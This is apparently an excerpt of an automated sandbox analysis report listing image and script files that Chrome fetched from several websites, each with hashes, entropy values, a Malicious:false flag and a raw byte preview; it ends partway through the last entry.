                                              Size (bytes):192
                                              Entropy (8bit):4.850831807238803
                                              Encrypted:false
                                              SSDEEP:3:fkreWdsRHq2pUHSR3H2ScWcKhAZSZpAdLLM8KFIwhGDnGQLM/QLB2UHSR3H2ScWz:fIdsRn6iH1cWfWZYiLMCfnGQLM/Q1BiZ
                                              MD5:BE9C2D12958B8BE449BD004A43B6F74A
                                              SHA1:66337C35BA4546E4F2B5B468E069E821E0E43C42
                                              SHA-256:182CDEECE07D57311DFC22C0A3E0659B9DF2CA01110C4238E62E1E8917EDABEA
                                              SHA-512:333BC1FBAD8B3A33645FA1590A9F33C03620D38B56DDDB0A0AE5DF8E7A5DDF3769F514D7DFEBB8A4C779918B08D4AB4C0089FF34F31820DF5AC6B695427C7402
                                              Malicious:false
                                              Reputation:low
                                              URL:https://pdf-online.on-fleek.app/favicon.ico
                                              Preview:failed to resolve /ipfs/bafybeifmbu2ttwabti5xp77ys3x23v6qdkud5ndbcn2piidi4mucrajf7m/favicon.ico/: no link named "favicon.ico" under bafybeifmbu2ttwabti5xp77ys3x23v6qdkud5ndbcn2piidi4mucrajf7m.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):18760
                                              Entropy (8bit):7.986328780802582
                                              Encrypted:false
                                              SSDEEP:384:b9QhijLMYYhTr/yCMCaQxpNgemRORvVaQqXjuZXPP5no7++ViduCEvdr:JQGC/yeaYMem0baQqXjAn5o7vEgCwdr
                                              MD5:5CBA1155894F83C1242EB0F73BAE8589
                                              SHA1:B439FA09C3617810BAE0622CA02B3BE8A9291B46
                                              SHA-256:8FC8DC8DFC932D6E228C43570E38F9095EC7A42F84497C28C580CC01D44A55AE
                                              SHA-512:F9894583D557C049EC3A8C6D210BC0F2A99FAD60DF177944E30BA0169130B9513603968B305EB9A6A727DA5A0C822032F50BB5765672F229CA38E98B25DEFC91
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF@I..WEBPVP8L3I../..?._.6.mU...n.CD..M7.t...9."M..m[U...p.@..@P..?w.+...(.mW9...=[...?xCB...9..4.H.C.4.EP5*L.D..0...TMUZiA.3.d..H....-m....b....h..0.--......../~../.?..~.....Ez2..$9x-...E.....D....@iz7U......4.n.h.......3.L..1g...5g....u....%.B...8k@9..?&E.lQ.(..b.!k...~0q..t....V]...o..'....$$.|.r. .. ..jgV...t:....DE`}.QP....?..k.>._WD.!..6z.kC.mb...~..Q.>.8.k...pjZ.>.h......6.k.....n..9..#^O..xd:.e...h..8.g.7a46k.....l...Z.S......f..5C.s.;F.....j[.'............/.{.....S.......x{9.....;....~..m...[.x.6.>..!..0..9.-,...0.....<.f0X\..............B..c.57.......:..\}.7....f8A..8..l...M.....>.:x...l.._....6.!..(,.q2........3.)J.......f..^..7c..H..>f0+.l..*.].'........ .H.v3............#!.hv|..`@..x......./.......<....t......S``..|......t..t|..Hj&.V-Y....vY7....2zO..P.../..V...Q.$.dJF..5;_..+.V...!-.'.#..}fd.....w..b..1...YF....k.....A..2Z.....&..p....^..AC..#....,..k9fI3..h.....8...k.I........Us.S.r...k.v...F../..._>n.`?.V"..._...[..IR..ri..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text
                                              Category:dropped
                                              Size (bytes):7588
                                              Entropy (8bit):4.127023876378625
                                              Encrypted:false
                                              SSDEEP:192:N7QiX2/qCHgkUFleNRAs74YNNvNesi6gI6mzb2kfnZVEC1V0o4f:Nct/UkUFwNRx8YNNvNesi6gI6mzb2kf8
                                              MD5:487A74CEEC3353507E3FB7DDB10858C8
                                              SHA1:C7A7E4DE2173F6C5B8F5C68A422FEB861C3148B9
                                              SHA-256:BF054380A7F7D46B487C00AE0EF5C51D96C6176A14AC44797BBDC9FF152CA64D
                                              SHA-512:97972485F451003A42DC1940C215934FCD49AF77040D6E3DD7B7B21860EDDB635A1CFA78E4B40DBB61FCDFB4632DBC0012E0C8F3938FDC75C0C79FE1DFA7C9C1
                                              Malicious:false
                                              Reputation:low
                                              Preview:!function($) {. "use strict";. $.fn.meanmenu = function(e) {. var n = {. meanMenuTarget: jQuery(this),. meanMenuContainer: "body",. meanMenuClose: "X",. meanMenuCloseSize: "18px",. meanMenuOpen: "<span /><span /><span />",. meanRevealPosition: "right",. meanRevealPositionDistance: "0",. meanRevealColour: "",. meanScreenWidth: "480",. meanNavPush: "",. meanShowChildren: !0,. meanExpandableChildren: !0,. meanExpand: "+",. meanContract: "-",. meanRemoveAttrs: !1,. onePage: !1,. meanDisplay: "block",. removeElements: "". };. e = $.extend(n, e);. var a = window.innerWidth || document.documentElement.clientWidth;. return this.each(function() {. var n = e.meanMenuTarget. , t = e.meanMenuContainer. , r = e.meanMenuClose.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):12648
                                              Entropy (8bit):7.971740687456701
                                              Encrypted:false
                                              SSDEEP:384:K0wk3GJ5Un3ftABTMEZbP9jizbiubhTk+mb:KOHnVOB0eunc
                                              MD5:5579F112B3D3615DA9FF1F76A98EA0BB
                                              SHA1:C22971EC1E4E80E5B7A08EE4154CA8E23F3EB483
                                              SHA-256:8E7C502A60236B2C25CCC99D777B07AB46D7E7F40450464668FF1E1DD41C5E8D
                                              SHA-512:7C9B07DA7FC136261F6D319DBF3FD3EC9C3EA472949910F8FFED3A8048FC14EE0799749D6E867B65FE9F72DB574E8DDD81AC28E5D41EC4E7F8B085223DA864AD
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):5716
                                              Entropy (8bit):7.95089745463362
                                              Encrypted:false
                                              SSDEEP:96:DhPXmw/KVHr57oaRC2+6ywmmZ/SExTuhgnWdnmomFL0QVTN+DStp0QcT8CJHCELU:DZXRSVH5E2+gmhQQp2FL0Q0DvQc/wELU
                                              MD5:FA2B94A1CD2FEA2DDE94A8E2D1D312DB
                                              SHA1:55FA7F72FC0A67BA2EEAE6574D36FA35F53B1523
                                              SHA-256:C3C3693B997A09947822F15AB5A0C013D04F80A62D9D9015AD50D6B7D8F69202
                                              SHA-512:032D38E67C3C9E05A2892849C5109FBC5DE3074148B0EEC7B555F194CDBD4A70FC3594D76AB82EF22A1C0D9D98AD7E98A6F406F36AE6D133D9F075F9BD2F67E4
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...aPLTE.......M......M........P..P....L.xW\[Rh................~\_...L..i9.....SOl.U`.^]...........YX...P.s_e.dWm]Z.T...f\.....tgzSg...fb..{]g...QLc....lYc..ha........I..ei...pQP..nR\.^f.......TP.`VzSP.Yh....[...`^........S].K..........G.......Q...l....ul..hi...n^ocz..hU.N%.........W!......zu...hP..!RDU.....ghs...oz..........|MZ...zl.S........|.NJ.iZlu.a..b.......t`y.]S....T".^O_.Q!.F..Ys_Ur[...=.l............og..k........x....aU..^...@#.: .NP......S........YT.jw...c5.pd.AG...M0.g]L....k...z...[q.[`...D..>...jG...tB...yP.....U...V/.....F.....9F......1w....IDATh.X.O.y..0......#.v..3...7..Se{p...T(E.f.`. ............m...]...kl.&..m...W.;.x..e{.g......y..y..i.L.. .$8...!.~...L....@e...A#h..'ICB&\..........$.2..=h......0..H~[Z....!*..@.O=I.?...d"AV.q.1..Frg||.A...U..\.8.....$..ol..T..1...H..$....T.7&BE.^E}$}4$X.Taw.Di.HH..._G|.4q.$.v...%..D^!y..|....iN.VI...}4$.../..\.9..6"....wu....[
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):5365
                                              Entropy (8bit):7.9516226413508795
                                              Encrypted:false
                                              SSDEEP:96:JKAuTDlmY7S5IY4Uc6i1aHbg6VS8tcHe0hj0sJb0KnNV8yy:wA0w51c6iQbgaS8tcHvlfVNV8yy
                                              MD5:88FE632C2AE5DAC3067AFC7D9644C1D0
                                              SHA1:9F2BE13F8FA1DD09BEDCFF7522D0ADB83A88510F
                                              SHA-256:F0BFCE6E79436C009EE8DDD55CCAC732FB6D6AB4EE38D2DEBDE98635A0F62CED
                                              SHA-512:A550C7B16534350B4CA2CE52D901B7238AEFAAEFC8E8DD299EFF18F01C722E18ADFFEDDD4BE9F54BF054A44830BAF5027DE4A368DFE33F05B3BBCFAC2834AC0A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/cdn.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...hPLTE....................[&........%.....!........$............._.../....R*..........Y..H......../..+....:aX^r....d....g............."....e......+.....Z.......o....K....WOT.........0.....A.A....o...9h....o=......s...........T..O.......T..jc.........lal..YZh=..x.............|........oOEf.......A|......vvyN..l....I...iW.E.......\.x...?.........HIDATh...W....g.{.{.....0. ....J.P..g4f..$.n.fw....@0:......L}...U.-.MU1.E.%.xQ+p....k.....}O.8.q./..~.@)...-.....T.eY..}.0'.T>....//..n=......,.;...P(..fY.B....0..i.........-............H ...Bdf...</........e`... .@@J.G~,..?./r~. ......r.......L0N..nb.A...1&.$.Y..<O._k.`.....9..ml.......JQ.u.~.[.$.^6.....a.r..!..VV.._P..I<..o....Ir/....Vo..9..s+..G.?..M.....?......j....D"....,......6...?.y......JC..Tww...L 6..0?.E.c+.....@d7./]"*.w.'.......?.XY...%.....J..@ ...^.q$.AH.......H)...."....:....l../..1?..c.!..#..E..6.+......dH.CxA..@.......:.)...Il.`~"s...D.(
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4119
                                              Entropy (8bit):7.947512826394149
                                              Encrypted:false
                                              SSDEEP:96:YMRL4uQQ7zMp3Sy4DUxsb8MoAtETrvtryeaqEC0brvGk:YMFyQ7zMphIwMVtEdfeGk
                                              MD5:65BC5DD91EA2554FE003ACAEB79D6E77
                                              SHA1:1D9710E190C6C4BAFC0AF77E061E450EB58CA416
                                              SHA-256:4CB6EA4CDBF6270AD0778CF651337AD71DDC942363CE0E39808B88163BB5F506
                                              SHA-512:A3A79653A2922872E7236FAB0829BF9423CFB2635CE30C6281705165C88347A2D1FBDB5595F7D5453D56CA21F0D089B08285C2ADF5DD3C3E79BB28B8F7E93720
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/logo.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE..}......ndp............~..............|..u........|..x..........u.........p..e........e............\.....j..k..................cZe......|t~...............l.rV......T....[.<....IDATh.X.B.Z....@A...{..Q.G.Y.s.........A...b.c.l.......>.m.F..h........./t..1....n..=...h.L.....6&....B.jm.V .....kG..+....dr.Jy<<T `#@Z.....h.......Z.<...;5.....V.....&.N.........x....3.... ....3.7..'..?..J....d}..E..y....3.._.....fa8.R .....g.c.ecY.fY.f.YQ8a.Z?..e.J.w...'..p.6.9...s...e.g.$n..i.....-...U.c....m...`...+,`.EG..tQ.....}fE...Q_....|. ,&^......%^...C..$...............K..R........ .p...;..K../V..$I..3g.2a.R1y.P8,#4.wq..%&5.....w=..ZLp....D-...t.?eP#.].v.$&..q...........v...m...H3v.[8.k L..+.,.=.1.....u4..F...e..me6...%H-..K.W.A..8.f.z..l..Q.....D..VU..L.}8L&...e.....6....x....s.J.Zn../3......,*..a ,6u....v..CVKD..b]aR......g^..7.D..:L..4G...u1/..$...u..K}K|.,....@.K3. x.5......S.%..19.l.H..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):16214
                                              Entropy (8bit):7.717418330587287
                                              Encrypted:false
                                              SSDEEP:384:4YNg7hZsc6Bd9nnE5np4E+ODobY0eWzYe2BItY:4YyFZsDBXE5nklvstBT
                                              MD5:6C15A3A395F29D483A0DB7998BA130DC
                                              SHA1:3B47D1E888B4522600ED0ED4F157189FAC797893
                                              SHA-256:B1E438C3D2E8C7A38FAD67431E0C52188E7BD62BC69513C7B22511CBDF092FED
                                              SHA-512:C099F03000A0A1B5695AFBF609CB167CD688540E62537098D1B817E6E8611E8AF13C283829B2CF86C041735BAD54373A221C310C6664A96BC2A7EA4DD189D1AF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/73/f7d9e3f0ec916b964874a8af689c6f7a.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3733
                                              Entropy (8bit):7.927833614906958
                                              Encrypted:false
                                              SSDEEP:48:QvTbrRlogeHtbr1WieyoLokgjFHjN+TOEaOJ0Fl8/CRWXa1aZv5aIz:kRlob1BeyXkgZN+VJ0fCa1aZsS
                                              MD5:20EE10AA4B4CA31954281C3E3188B65C
                                              SHA1:677E00D604944FB1EB2A5E3960C8092291695C60
                                              SHA-256:5C00228A4B411CBE6F96A32706AFE59DCE736E9F02261818233506C65317406C
                                              SHA-512:BBF9C7953B31F3F3AFFF367A5B0372640DF7E9A86CD848CC20C5E8DE8EB742CB42EF3DE2A269E17C86F8576411C8C9F3C22FDB324AF39A40CB6D54865E9397BF
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...>PLTE*+I...DDw....NN,,L......$.r((H!.;...%$7...(*P%$BGE|DEq@B|.IJ...?@s!(F>@k,-W*+@+$I.........21Q.....j..1ECg.PF.KV..r40B$2K.SS...UScL>u..<7?VGH.6&P,.z2 >......44`.C=..../R+................CL.KV..gD#9:....UZDF]).k.[etr.......:.~1je.@M.:J".Y....E<ba|.O_.cH:.se+9~5It@g...mZH.........C.S....K..l......%.h.."..ZM...}f..\.....IDATh..kW.J.....!.p.m..AI..-E.r. ..VDm]}........'\...s.u.tG0$a~........,..&E....$Es9Q......mI.47'F.s...hT~b...E...;......~^.7M.$..N..C.^.......l.....Xz..w[....J..h.......B..O.F&..d..H<........{./.[`..t+.7-..Q..u..a+S......)p.G.=#.0..X!..H.y..-.,....C..C.P..n...D9a..2X.h.2...a......$b..lp,<hDf.D}..\n.. D..3.<...fp .(Y.>...[....-1W.p+.6M.9q...........w.D...,../.c.E,#>."...z..#.*..r.>..<.x.].10.D.pw}.{}.........3...:......-%......c.G.+...B.Y1{..vC...C.BL.....wgw........[...qs4.V...I.A.Gf..i....c...0..."..t.C@....]"....+(1.o..|`,..n.n....u.._\..(Y=m.D..C....... &.r=.!.C..x...B.Z|.r.'.sQ..,S
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 196x61, components 3
                                              Category:dropped
                                              Size (bytes):2326
                                              Entropy (8bit):7.726565668160658
                                              Encrypted:false
                                              SSDEEP:48:ueXVrHftdtW4iThDhhhqcGoC0JeWTu9SbO5RkZH2+JZ:u2rftbi118ee6SRYWE
                                              MD5:69023E5B2A2040F40A9A4F86EE22CA28
                                              SHA1:A9D5DD8EF335CA4B0A4CBC6A6875797D1230B2D9
                                              SHA-256:8B5EE668094FACCC85C7CA06417E3DE01224CC392F89F10897D762AB6CB6291E
                                              SHA-512:F89462992ADC9AA0BFC77713922FF1F1FF8CA3E6999463AAA284751385B31F479128EDAF38D62A3BE4DC9987E1B74F7F890DC0E115673F61180A35B9F566F5B6
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF.................................... ..............&...#..../ $'),,,. 152*5(+/)...........)...))))))))))))))))))))))))))))))))))))))))))))))))))......=...."......................................4......................!1.AQ.."aq........2R..Bbr...........................................................?...),..f......].@>..J4....[@.r.j...P..NJ.".?].)aH.........8..i....j.BS..............R...eqx.R.3S..<_...7.2....B.[... 3R.<.Ztq.......I*J.$..;.SHR0[...r..J...*..O..8.\78...c. .JO+....~u...X.7..Y./z.)d.5...I....s...J3......kN.@.sI.qcJ....!......t<..b.P.T.R..[.^.v.4LIU*J\..9...../..WE.......Q..K.Q......$...(..A.>w>...A..Bt9V....O...(,..MA.r.p.Y\..5....`1..*....S2z...X>.\..J.......^..:..AL...\.g.<.[.......$OB.T....w..T.....L...X%.h..kA....k...T.%........+.......~..G..j...Z'.S$.^..8%).-..!.e.-j.....]...."D..N.2Y.g..C....an...B....@Q....q......2.0p..6Q~..`phq..!......| ...J[.~."`M.Om.L.!....=...`j..=......#.|.c .4..e...U."..w...N.k?|....2.....?-..g.c..D+
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):7767
                                              Entropy (8bit):7.958721094201888
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4waMKIOIPRa4NHhuR7I0FUGJ3rmbII:K0wSIOIPRNPuzUa3rq7
                                              MD5:F109EAC3FB18A77513C246B6D515DD70
                                              SHA1:F7C9C2AD5F4105C09C2ABB894EB3665102E601AA
                                              SHA-256:341640B23F2D92C7807D9DB258BA2FCE0CDBAED844F84381F09E630BA6D67F78
                                              SHA-512:14D4CCE628CAE517134D7DA3B5C6B39C621C3A79B63A315BC3CB2B7CEB0A9D280320167CB75C1FA9DEA141DB557DD0C31AEED32A1350C664983685FEB87879ED
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:dropped
                                              Size (bytes):44001
                                              Entropy (8bit):7.9672965048432625
                                              Encrypted:false
                                              SSDEEP:768:/V6623otdd3xZvL/2JjLkncRp/6qVm+peZ4XR1pRPKpxj2o7QT5wpKRmqN:yEZx2JjLYeAqI+pV3Ud23wpKRmS
                                              MD5:70AD24675BC319EEABCF1AE32556A6AE
                                              SHA1:06033CD04398FDF22BFF86A5D9C5B1CD04994FB7
                                              SHA-256:6880E52706B234FC924CF26F1104110F26857AA07398197296D4F178C2D885AA
                                              SHA-512:2ACC212863B74DEBD19E780636943753212BBCB591CE3D6194DF2E35C4E849F3D90506909E8912D6386940FE554033BA22F1A73D7CFDBAF795A4DA56806C9565
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm..............".................................................y.)K..d.EE4.S.B...a.F....(.5.%.....A.$(..E B..H.E....*(...e..JS.9)E.j3.+.u(...a.F..1.b.!..b..J..1.B.I!$!... "....RHB>.e..r...V.'da\!\Q..q.!.F1.P.Q.H.!F(....1I .i...!.@....$$..s..r..9..cD...\"EB1.k.c..F1QQQJ( .PIF.F1.D..... B.4.Q.BI..,..)69.C....!...c.F...D(.*.D....b.....(.E!..M ....Dk.N.A..977 .&...Q.......`.A..c.).....)B.$...AE$.".m.)I...$.4/.JR$...H.I(.c....(F...!..H..RQQQIF"QQ..........(.H...IM.`.I....J0I(...#....b.!8.%...IDIE "..i.@...$."...NM.56...`.(....c....bQJ1......I$...HI..B@..$.Q.$..6..c..l....b.....R.!(. ..H..$.H"..."....iD..(@.>.!.C%1.`1 @....((.......J1QDH.$$%..I..........A...Hm."Rm....!E(.(E!D.....J1"..(D@.QQ....P..D.(..._A.M.r$........I%..@...$....I$..QJ).i.... .@...K...0m....44.QI..P.."1....I$..RJ$F.Qi......H@.^......9.....!!(...bE!$...$.CDH.(.&
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3882
                                              Entropy (8bit):7.880510028903841
                                              Encrypted:false
                                              SSDEEP:96:AEEcXfff/XWov1AiFzX/GR2tsQwX6Gpn3+PW:wWfff/WovVFTGR2Gh9pn3f
                                              MD5:D688D3229A17F1295B6653FD1CE362DF
                                              SHA1:B90B58962AC45BC4EAF506BE9383E709844D716F
                                              SHA-256:18E45F055EB19AB605C846E37B142AA8C596CDC34E834BB9787DADD7828C97AF
                                              SHA-512:A5FF6E92F8CB151D1931A7CA74F7D16FB97544D31CE49418F610F6047DFDA24D98709C8787D09F2EFE021B60FC4E078923FF33F67D97406DFDF2D65368E74B79
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P.....9.......PLTE...............................................................F.....L....R..W..]..c.._.....H..h..Y..x..k...................M..p.............). .O..r..}.....e..............#.v.....J..n.@.O.&.........#.T.........`.l.. .1../....u..`....p.{P.]..,.....M0.@.....G..........5........3..........U..R..A..0.........p..........@tT..C..=.X..|...................`.p..X..9.........................@.S@.S@}S..A .3.........P.b..a./......................f@yT@.Q@.P@.O0yE c7 .1.r'..&.......................p.~..x`.oP.aP.]@.Q..M0.D0.@ k7 .5 .1..%..$..#..#............p.}p.{p.{`.o..n`.mP.bP.`P.`..X..W@.R..N..N0nF0.C0.@.W).R).](.....`.l..]P.].:..5.f(.m'.}&..^.....tRNS....@. ..P.0.`.p...%,.3....IDATh...K.q...ts...9..v.6-..;r...2.-..m.U,............(.:....(..zPQ........vt.l...xm.|.~....O..C.@(...|..$_ ...9"......d...-.e........ ...v......n^x~.2..)..O.4.......n.....8..t..!.paee%....P.`..t...K.......I
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4894
                                              Entropy (8bit):7.93798603008835
                                              Encrypted:false
                                              SSDEEP:96:3Tpsj4Tj/4ArKX37fYmsaLQY1Q/4PadKfjnyzqNBw9im3GMaH:SMf/4Oarfbs+XOdKrf1MaH
                                              MD5:DC02610316D979849714B1D6875F6CA2
                                              SHA1:C4971481DDFFCDFDA2B63066B6525CA3225F5EC9
                                              SHA-256:1C87B43736645D2DA785BBD22A0383CBC0EE4CE147A76DA927017836C417EE94
                                              SHA-512:2B5DF5B1E540E83F0F18E6C1DC7B752E5C49267B52F528E9FE70104EC6D8AD62BFCD80F7E2FEDAC36CB602B745282D189E017B858CD01664ADD7C5EA449C6D68
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/contact_us.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.........2V..=..........1U./T............................+P..?....5Z.................<."G....&J...c....9.4W......mQ.... ..\.......?...c.;.......V....c...5\......k*K.1M..2.......BY........@....3M.*U..=......]7Z...&K..-............48[.q......Z...l.....u..Z.....wI`.............q........g..0.]u..........y.....9b.....H...................xX.&.u......8.|D....Pg...w.......O.H\.......EZ.*S...o....nF.Q2.....5..J..S.t..?..<...kj....6g...}...:N.....IDATh...S....p.r#y.P.......D..rD1....7Zk.o.....v..m.=..lg......F..-.....7.(.3..|...F........<.$.eY...`y..,....l..%....HQ.$....6k..].Y....w&9.!.B.....u`."...,.{...........HI.I.e7.....$..Hr..+S.oe..,.b.~z.1-.._.x^.X...dr...9......b'.W........F..C%(J.`HR.....S.z.....f.l6k....x.D^.{.h{...~..2Cv.....'.2....E"...5I.XV.J0n.y.V.X..........i.i\.u..R........}....tw.... ";/r....'&&^?....X..^...|B.....X..bZF...L.<..T.0........K;..sO.]...H.t.u8Q..C..l%...#...-.:.e..5#cd2V&.]G,k.....R...~..x..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 640x828, components 3
                                              Category:dropped
                                              Size (bytes):45980
                                              Entropy (8bit):7.907311535015654
                                              Encrypted:false
                                              SSDEEP:768:JuOR2GP3mm5+BcA7pXqeh8L9hu4O+YxBlKHaA2fGIG0n1AQTZfCZf/:YOR/3n5cXhv+YMHn2jfTTZf0f/
                                              MD5:727B952C2AB5E50C5879716262A8AC81
                                              SHA1:FAE14358F2BA3D069FE4D7B320E9796A5A357794
                                              SHA-256:AF484341D6451B311FE5BD1AC22F13274FAA6DCC24E8D972D8D3E10E1731A421
                                              SHA-512:27B118D0CDA5682CC7D381D2AA633B9605B20D57DDFC399B148756859143C3465226D58BFFCABD9C6FADF49FEFC30813EB991EFE177B3B6EDB21F558606EF1C0
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:9CDD67C8930B11ED8D208D96229A68C3" xmpMM:DocumentID="xmp.did:9CDD67C9930B11ED8D208D96229A68C3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9CDD67C6930B11ED8D208D96229A68C3" stRef:documentID="xmp.did:9CDD67C7930B11ED8D208D96229A68C3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................'..'2&.&2.&&&&.>55555>DAAAAAADDDDDDDDDDDDDDDDDDDDDDDDDDDDD.... . &..&6& &6D6++6DDDB5BDDDDDDDDDDDDDDDDDDDDDDDD
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):119988
                                              Entropy (8bit):7.998429760817896
                                              Encrypted:true
                                              SSDEEP:3072:387uw4eDgp4lfR1tR1Gd4MV+kIEFtrtPxAazH6qUzf5kH:387uheuQfR1tREWMVBZXtPtzaqGf2H
                                              MD5:50B5E2D5FCEED2645D29D9E1B4FEAE25
                                              SHA1:BA5CE9299E8CB02F5D4E5C78EBC14AAD5021C825
                                              SHA-256:77D9018BF5A161BBACC82EBADDB8F35F9257C6EF29A1F263086E0CC7A795E432
